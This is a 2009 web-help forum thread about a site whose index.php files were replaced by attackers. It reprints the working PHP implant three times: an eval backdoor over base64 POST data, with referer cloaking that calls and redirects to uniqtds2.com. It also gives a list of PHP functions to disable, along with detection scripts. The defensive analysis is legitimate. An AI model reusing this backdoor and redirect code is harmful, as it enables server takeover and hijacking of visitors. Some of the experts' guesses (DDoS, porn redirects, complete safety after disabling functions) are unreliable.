Solved

Boards not loading properly after attack

Posted on 2009-05-15
897 Views
Last Modified: 2013-11-11
Today my site suffered an attack (again) and several index.php pages were deleted and replaced with the hackers' own files. Now I have reversed the damage, but my boards are not loading properly. What can be going wrong? The rest of the site is running smoothly. This is the code the hackers had set in the (now deleted) index files:
<?php $a=@$_POST['a'];if($a && @$_POST['b']==sha1(md5($a))){$a=base64_decode($a);eval($a);} function get_counter(){$ip=$_SERVER['REMOTE_ADDR'];$uniq=@file_get_contents("http://uniqtds2.com/ip.php?ip=$ip");if($uniq===false){return false;}if($uniq=="go"){return true;}return  false;}$ref=strtolower(trim(@$_SERVER['HTTP_REFERER']));if((strpos($ref,"google")!==false)and(strpos($ref,"bot.htm")===false)){if(get_counter()){@header("Location: http://uniqtds2.com/tds_u.php?dname=".$_SERVER['HTTP_HOST']);die();}}if((strpos($ref,"yahoo")!==false)and(strpos($ref,"slurp")===false)){if(get_counter()){@header("Location: http://uniqtds2.com/tds_u.php?dname=".$_SERVER['HTTP_HOST']);die();}} ?>


Question by:axtur
4 Comments

Expert Comment

by: Beverley Portlock
It seems to be counting traffic. I have not gone into it in detail, but that is what it seems to be doing. I have attached a reformatted version so you can study it in detail.

If the site is not running properly then check for .htaccess files and see what they contain. Your FTP client may need a setting to "Show hidden files".
<?php

$a = @ $_POST['a'];
if ($a && @ $_POST['b'] == sha1(md5($a))) {
    $a = base64_decode($a);
    eval ($a);
}

function get_counter() {
    $ip = $_SERVER['REMOTE_ADDR'];
    $uniq = @ file_get_contents("http://uniqtds2.com/ip.php?ip=$ip");
    if ($uniq === false) {
        return false;
    }
    if ($uniq == "go") {
        return true;
    }
    return false;
}

$ref = strtolower(trim(@ $_SERVER['HTTP_REFERER']));
if ((strpos($ref, "google") !== false) and (strpos($ref, "bot.htm") === false)) {
    if (get_counter()) {
        @ header("Location: http://uniqtds2.com/tds_u.php?dname=" . $_SERVER['HTTP_HOST']);
        die();
    }
}
if ((strpos($ref, "yahoo") !== false) and (strpos($ref, "slurp") === false)) {
    if (get_counter()) {
        @ header("Location: http://uniqtds2.com/tds_u.php?dname=" . $_SERVER['HTTP_HOST']);
        die();
    }
}
?>

Accepted Solution

by: markh789 (earned 500 total points)
The script is used as a DDoS spot.
Let me explain what they're doing: they have bots set to the page to open it, using a botnet. Not only will that cause too much traffic, it will also open http://uniqtds2.com/tds_u.php?dname=*var*, and this PHP script could be doing... anything. They also have a PHP eval() set up so they can run their own PHP commands. The bots may still be trying to access files. Check your Apache logs and see what files they're accessing; if it's from a random file then use .htaccess to block that file (look in error.log, something like that).

You should try disabling the function file_get_contents for a few weeks and see if any changes happen.

They could also be trying to make a profit off adverts by redirecting all your users to a porn website. I've seen this done before: they will register, enter CC details, etc.; spam happens, money is lost; you name it, they will do it. Although, since their bots are opening the advert around 10 times/second, they get 10 cents a click... they're using your website as a money-maker!

What I can recommend is to try and block uniqtds2.com with something like OpenDNS.

Disable the following functions for security:
apache_child_terminate,apache_setenv,define_syslog_variables,show_source,ini_set,passthru,system,popen,ini_read,escapeshellarg,proc_close,proc_open,exec,shell_exec,system_exec,ini_alter,ini_get_all,ini_restore,parse_ini_file,escapeshellcmd

In your php.ini; if you're on a host, request that they do it for you.

Disabling those functions will help block shells; if you want, you can also turn display_errors to false in your php.ini.

Right now you should be checking EVERY file, even .txt files, to see if any of the code is there; try uploading the upgrade files for your board to see if that fixes it.

I've added a few comments to the PHP code, take a look.

If it's only like 20 bots, try blocking all the bots' IPs in .htaccess.
Order Allow,Deny
Allow from all
# one "Deny from" line per bot address; bot1..bot5 are placeholders for the real IPs
Deny from bot1
Deny from bot2
Deny from bot3
Deny from bot4
Deny from bot5

(that may be incorrect)
<?php

$a = @ $_POST['a'];
if ($a && @ $_POST['b'] == sha1(md5($a))) {
        // Decode base64 code
        $a = base64_decode($a);
        // Run the base64 code
        eval ($a);
}

function get_counter() {
        $ip = $_SERVER['REMOTE_ADDR'];
        // This could be where the ddos is coming from.
        $uniq = @ file_get_contents("http://uniqtds2.com/ip.php?ip=$ip");
        if ($uniq === false) {
                return false;
        }
        if ($uniq == "go") {
                return true;
        }
        return false;
}

// Grabs referral, it also checks for bot.htm in the referral
$ref = strtolower(trim(@ $_SERVER['HTTP_REFERER']));
if ((strpos($ref, "google") !== false) and (strpos($ref, "bot.htm") === false)) {
        if (get_counter()) {
                // Redirects to a porn website.
                @ header("Location: http://uniqtds2.com/tds_u.php?dname=" . $_SERVER['HTTP_HOST']);
                die();
        }
}

// Checks to see if "yahoo" or "slurp" is in the referral
if ((strpos($ref, "yahoo") !== false) and (strpos($ref, "slurp") === false)) {
        if (get_counter()) {
                // Redirects to a porn website.
                @ header("Location: http://uniqtds2.com/tds_u.php?dname=" . $_SERVER['HTTP_HOST']);
                die();
        }
}
?>

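As an added example (not code from this thread or from its participants): a Python scanner that implements the "check EVERY file" advice by walking a web root and flagging files that carry several indicators of the implant together (eval() of a POSTed variable gated by sha1(md5()), the remote file_get_contents, a referer check feeding a Location redirect, and the uniqtds2.com domain). The demo tree it builds is constructed here; the trimmed implant string is a placeholder copy for the scan, not the asker's real file.

```python
import os
import re
import tempfile

# Each indicator is a regex over raw PHP source; one alone can be benign, several together point at this implant.
INDICATORS = {
    "eval_of_variable": re.compile(r"eval\s*\(\s*(\$\w+|base64_decode)", re.I),
    "post_auth_sha1_md5": re.compile(r"\$_POST\[.{0,40}sha1\s*\(\s*md5\s*\(", re.S),
    "remote_fetch": re.compile(r"file_get_contents\s*\(\s*[\"']https?://", re.I),
    "referer_cloaking": re.compile(r"HTTP_REFERER.*?header\s*\(\s*[\"']Location:", re.S),
    "tds_domain": re.compile(r"uniqtds2\.com", re.I),
}

def scan_file(path):
    """Return the sorted indicator names found in one file (any extension)."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        src = fh.read()
    return sorted(name for name, rx in INDICATORS.items() if rx.search(src))

def scan_tree(root, min_hits=2):
    """Walk every file under root (dotfiles included); report {relative path: [indicators]} for files with >= min_hits."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            hits = scan_file(path)
            if len(hits) >= min_hits:
                findings[os.path.relpath(path, root)] = hits
    return findings

# Constructed samples for the demo tree: a trimmed placeholder copy of the quoted implant and a clean page.
IMPLANT_SAMPLE = (
    "<?php $a=@$_POST['a'];if($a && @$_POST['b']==sha1(md5($a))){$a=base64_decode($a);eval($a);}"
    "function get_counter(){$ip=$_SERVER['REMOTE_ADDR'];"
    "$uniq=@file_get_contents(\"http://uniqtds2.com/ip.php?ip=$ip\");return $uniq==\"go\";}"
    "$ref=strtolower(trim(@$_SERVER['HTTP_REFERER']));"
    "if((strpos($ref,\"google\")!==false)and(strpos($ref,\"bot.htm\")===false)){if(get_counter()){"
    "@header(\"Location: http://uniqtds2.com/tds_u.php?dname=\".$_SERVER['HTTP_HOST']);die();}} ?>"
)
CLEAN_SAMPLE = "<?php require 'common.php'; echo 'boards index'; ?>"

def build_demo_tree():
    # Fresh temp dir: implant in the root index.php, clean page under boards/.
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "boards"))
    for rel, body in (("index.php", IMPLANT_SAMPLE), (os.path.join("boards", "index.php"), CLEAN_SAMPLE)):
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root
```

Run `scan_tree("/path/to/public_html")` against a real web root; lower `min_hits` to 1 to also list single-indicator files for manual review.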

Author Comment

by: axtur
I have checked the code and I don't see anything strange in it; the only changed file (index.php) has been reversed, and no other files have been found.

What can I do? How can I see the hidden files?
Expert Comment

by: markh789
file_get_contents could be used as a DDoS point, to download.
You can easily set bots to that page to tell the server to download the file as many times as they want.

If you can run shell commands you can run this shell command:
    ls -a /PATH/HERE

Replace /PATH/HERE with your public_html dir, and you can check it for files, etc.

Did you disable the functions:

apache_child_terminate,apache_setenv,define_syslog_variables,show_source,ini_set,passthru,system,popen,ini_read,escapeshellarg,proc_close,proc_open,exec,shell_exec,system_exec,ini_alter,ini_get_all,ini_restore,parse_ini_file,escapeshellcmd

If you did, you're fine from further attacks.

If you want DDoS protection on your server then look at what I found here:

Run this in shell:
cd /usr/src
wget http://www.zdziarski.com/projects/mod_evasive/mod_evasive_1.10.1.tar.gz
tar xfz mod_evasive_1.10.1.tar.gz
cd mod_evasive
# build, install and enable the Apache 2.x module with apxs
apxs -i -a -c mod_evasive20.c

THEN edit your httpd.conf file and add:
<IfModule mod_evasive20.c>
DOSHashTableSize 3097
DOSPageCount 2
DOSSiteCount 50
DOSPageInterval 1
DOSSiteInterval 1
DOSBlockingPeriod 300
</IfModule>

Change your values if needed.

If you have root, that is.

If not, ask your host for some better DDoS protection.
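As an added example (not the thread's own code, nor mod_evasive's): a Python pass over Apache combined-format access log lines that applies the DOSPageCount / DOSPageInterval threshold from the block above to find flooding IPs, renders the .htaccess Deny block from the accepted answer for them, and counts 30x responses to Google/Yahoo-referred visitors, which is the footprint the quoted referer-cloaking redirect leaves in your own logs. The log lines and IP addresses are constructed placeholders.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Same page more than DOS_PAGE_COUNT times within DOS_PAGE_INTERVAL seconds (values from the mod_evasive block).
DOS_PAGE_COUNT, DOS_PAGE_INTERVAL = 2, 1

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+) [^"]*" (\d{3}) \S+ "([^"]*)"')

def parse(log_text):
    """Yield (ip, unix_time, path, status, referer) per combined-format line."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            ts = datetime.strptime(m.group(2), "%d/%b/%Y:%H:%M:%S %z").timestamp()
            yield m.group(1), ts, m.group(3), int(m.group(4)), m.group(5)

def find_offenders(log_text):
    """IPs whose hits on one URL exceed DOS_PAGE_COUNT inside a DOS_PAGE_INTERVAL sliding window."""
    windows, offenders = defaultdict(deque), set()
    for ip, ts, path, _, _ in parse(log_text):
        w = windows[(ip, path)]
        w.append(ts)
        while ts - w[0] > DOS_PAGE_INTERVAL:   # drop hits older than the interval
            w.popleft()
        if len(w) > DOS_PAGE_COUNT:
            offenders.add(ip)
    return sorted(offenders)

def live_redirects(log_text):
    """Count 30x answers to search-engine-referred visitors per (ip, path); any hit means the implant is still serving."""
    hits = defaultdict(int)
    for ip, _, path, status, ref in parse(log_text):
        if status in (301, 302) and re.search(r"google|yahoo", ref, re.I):
            hits[(ip, path)] += 1
    return dict(hits)

def htaccess_block(ips):
    """Render the .htaccess Deny block from the accepted answer for these IPs."""
    return ["Order Allow,Deny", "Allow from all"] + [f"Deny from {ip}" for ip in ips]

# Constructed sample lines (documentation IP ranges, not the asker's real log).
SAMPLE_LOG = """\
198.51.100.7 - - [15/May/2009:10:12:01 +0000] "GET /boards/index.php HTTP/1.1" 302 0 "http://www.google.com/search?q=forum" "Mozilla/5.0"
198.51.100.7 - - [15/May/2009:10:12:01 +0000] "GET /boards/index.php HTTP/1.1" 302 0 "http://www.google.com/search?q=forum" "Mozilla/5.0"
198.51.100.7 - - [15/May/2009:10:12:01 +0000] "GET /boards/index.php HTTP/1.1" 302 0 "http://www.google.com/search?q=forum" "Mozilla/5.0"
203.0.113.5 - - [15/May/2009:10:12:01 +0000] "GET /boards/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [15/May/2009:10:12:05 +0000] "GET /boards/viewtopic.php?t=1 HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
"""
```

Feed it the contents of your access_log; an empty `live_redirects` result after the clean-up is the check that the boards are no longer bouncing search-engine visitors.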